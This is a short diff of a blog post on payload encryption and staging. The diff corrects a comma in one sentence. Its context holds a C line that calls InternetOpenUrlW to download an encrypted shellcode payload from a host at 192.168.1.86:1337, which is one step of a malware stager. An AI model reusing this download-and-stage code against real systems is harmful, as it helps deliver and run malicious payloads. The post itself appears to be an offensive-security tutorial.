nirajkharel/nirajkharel.github.io/_posts/2024-04-27-payload-encryption-staging.md

     }
 ```

-Once we have the handle to the internet, session, open the handle to the shellcode specified by HTTP URL.
+Once we have the handle to the internet session, open the handle to the shellcode specified by HTTP URL.
 ```c
     hInternetShellcode = InternetOpenUrlW(hInternet, L"http://192.168.1.86:1337/encrypted_payload.bin", NULL, NULL, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, NULL);
     if (hInternetShellcode == NULL) {